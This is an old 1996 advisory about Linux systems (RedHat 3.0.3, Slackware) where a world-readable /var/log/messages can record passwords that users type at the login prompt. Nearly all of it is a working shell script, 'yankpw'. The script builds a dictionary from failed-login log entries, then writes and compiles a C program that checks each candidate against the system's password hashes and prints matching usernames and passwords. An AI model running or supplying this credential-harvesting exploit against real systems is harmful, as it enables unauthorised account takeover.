COMMAND

    kernel

SYSTEMS AFFECTED

    RedHat 3.0.3 & Slackware (maybe others)

PROBLEM

This old problem refuses to die.

#!/bin/sh
#
# yankpw
#
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# <daveg@escape.com>
# http://www.escape.com/~daveg

echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$

grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$

if [ ! -e ./scrack ]
then
   echo "Creating scrack.c"
   cat << ! > scrack.c
#include <stdio.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
   struct passwd *pwd;
   FILE *fp;
   char buff[80], salt[3], *encrypted_string;

   if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
   {
      fprintf( stderr, "Couldnt find dict file\n" );
      exit(1);
   }
   while ( fgets( buff, 80, fp ) != NULL )
   {
      setpwent();
      buff[strlen(buff)-1]='\0';
      while ( ( pwd = getpwent() ) != NULL )
      {
        if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
           ( strlen( (*pwd).pw_passwd ) == 13 ) )
        {
           get_salt(salt, (*pwd).pw_passwd );

           encrypted_string = crypt( buff, salt );
           if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
           {
             fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
             fflush(stdout);
           }
         }
      }
   }
}
!
   echo "Creating scrack"
   cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi

./scrack /tmp/messages.dict.$$

echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.